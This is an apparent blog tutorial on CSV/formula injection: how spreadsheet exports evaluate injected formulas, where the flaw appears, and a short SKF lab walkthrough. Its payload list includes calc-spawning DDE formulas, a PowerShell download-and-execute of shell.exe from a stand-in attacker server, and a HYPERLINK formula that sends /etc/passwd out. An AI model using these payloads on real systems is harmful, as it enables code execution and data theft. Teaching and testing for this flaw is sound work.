
Everything You Need to Know About CSV Injection

CSV injection might sound complex, but it’s easier to grasp than you think. Essentially, it involves slipping malicious formulas into the cells of a CSV file. When the file is opened in a spreadsheet program, the program evaluates those formulas, and they can do all sorts of nasty things. Here’s a closer look at how it all works:

What is CSV?

CSV stands for Comma Separated Values. Think of it as a simple text file. It stores data in a table format. Each line in the file represents a row in the table. Columns are separated by commas. CSV files are commonly used to exchange data between different applications. They can be used for exporting contact lists, financial records, and more.

How CSV Injection Works

Imagine you have a website that lets users enter their name and email. An attacker might enter the following in the name field:

=cmd|'/C calc'!A0

When the website exports this data to a CSV file and someone opens it in Excel, Excel tries to run the formula. In this case, it might try to open the calculator on Windows.

Common Attack Vectors

Where do these vulnerabilities pop up? User profile data is a big one. Imagine a website that allows users to export their profile information as a CSV file. If the website doesn’t properly sanitize the data, an attacker can inject malicious code into their profile fields. Contact forms are another common target. Attackers might enter formulas into form fields like name or email address. When the data is exported to a CSV file, the injected formulas are ready to strike.

Where can you look for CSV injection?

Look at user profile sections, admin accounts, and any place where data is transferred or exported into a CSV file.

Common Payloads of CSV injection:

  • Spawn a calc

DDE ("cmd";"/C calc";"!A0")A0
@SUM(1+1)*cmd|' /C calc'!A0
=2+5+cmd|' /C calc'!A0
=cmd|' /C calc'!'A1'

  • PowerShell download and execute

=cmd|'/C powershell IEX(wget attacker_server/shell.exe)'!A0

  • Data theft

=HYPERLINK(CONCATENATE("http://attackerserver:port/a.txt?v="; ('file:///etc/passwd'#$passwd.A1)); "poc")

Now, let’s take a simple and quick practical example

In this case we are going to use the SKF labs, and I’m pretty sure that if you complete all the SKF labs you will gain advanced knowledge of web application vulnerabilities.

The first step is to identify input forms and parameters that can be exported as CSV, XLS, XLSX or ODS. In this example we find that it’s possible to add new pages and, after clicking the “Export pages” button, generate an XLS report of all pages.


Step_2: Now let’s see if we can inject a simple spreadsheet formula.


The page “Injection2” was created and the formula was fully accepted.


Of course, the formula has no effect in the browser. The test is still important: it tells us the application is not validating the “=” operator, so it can be used to inject formulas into our spreadsheet.

Step_3: Now, let’s export the pages and see in our spreadsheet application (Excel, Calc) what the formula injection looks like.


Here, in the spreadsheet application, the formula was executed.

So, this is a basic lab where I perform

Now, for practice, I suggest you go and solve the lab to sharpen your skills in CSV injection.
